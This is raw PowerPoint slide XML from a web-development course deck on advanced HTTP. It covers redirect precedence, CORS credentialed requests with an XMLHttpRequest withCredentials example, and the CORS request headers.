              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTTP redirects are always executed first when there is not even a page transmitted, and of course not even read.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="731520" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTML redirects (&lt;meta&gt;) are executed if there weren't any HTTP redirects.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="731520" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JavaScript redirects are used as the last resort, and only if JavaScript is enabled on the client side.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When possible, always try to use HTTP redirects, and don't use a &lt;meta&gt; element.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{36140335-6261-4D17-B74F-AB4A9A01B6E2}" type="slidenum">
              <a:rPr lang="en-NZ" smtClean="0"/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-NZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="468784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10-Apr-17</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10-Apr-17</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10-Apr-17</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10-Apr-17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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endParaRPr lang="en-US"/>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10-Apr-17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429000" y="18288"/>
            <a:ext cx="4114800" cy="329184"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Slide Number Placeholder 8"/>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10-Apr-17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429000" y="18288"/>
            <a:ext cx="4114800" cy="329184"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>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10-Apr-17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429000" y="18288"/>
            <a:ext cx="4114800" cy="329184"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>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10-Apr-17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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endParaRPr lang="en-US"/>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10-Apr-17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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endParaRPr lang="en-US"/>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152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19200"/>
            <a:ext cx="8229600" cy="5486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Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
        <a:buChar char="ü"/>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mozilla.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eveloper.mozilla.org/en-US/docs/Web/HTTP/Cookies" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/HTTP/Access_control_CORS" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/HTTP/Cachin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foo.exampl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bar.other/"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Advanced HTTP 3 </a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>IN712 Web 3 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24038619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access control scenarios</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Requests with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>credentials</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1219200"/>
            <a:ext cx="4343400" cy="3962400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A very important capability exposed by both </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CORS is the ability to make "credentialed" requests that are aware of HTTP cookies and HTTP Authentication information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By default, in cross-site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>invocations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, browsers will not send credentials. A specific flag has to be set on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> object or the Request constructor when it is invoked.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Although </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>line 11 contains the Cookie destined for the content on http://bar.other, if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bar.other</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> did not respond with an Access-Control-Allow-Credentials: true (line 19) the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>browser would ignore the response and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>make it available </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to web content</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4468885" y="1143000"/>
            <a:ext cx="4675115" cy="5715000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10438" y="5473005"/>
            <a:ext cx="4561562" cy="1384995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> invocation </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new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin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rPr>
              <a:t>XMLHttpRequest</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b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin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rPr>
              <a:t>url</a:t>
            </a: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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bar.other/credentialed-content</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</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err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>invocation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'GET'</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rPr>
              <a:t>url</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true</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b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>invocation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>withCredentials</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="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b="1"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true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>invocation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>onreadystatechange</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> handler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>invocation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2293430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HTTP request headers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1219200"/>
            <a:ext cx="9144000" cy="5486400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Usually developers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>using cross-site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> capability do not have to set any cross-origin sharing request headers programmatically</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>These </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>headers are set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>by the browser when </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>making invocations to servers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Headers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>that clients may use when issuing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> requests in order to make use of the cross-origin sharing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>feature:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>URI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> indicating the server from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>which domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the request initiated.  It does not include any path information, but only the server name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Access-Control-Request-Method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>when issuing a preflight request to let the server know what HTTP method will be used when the actual request is made</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Access-Control-Request-Headers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>when issuing a preflight request to let the server know what HTTP headers will be used when the actual request is made.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
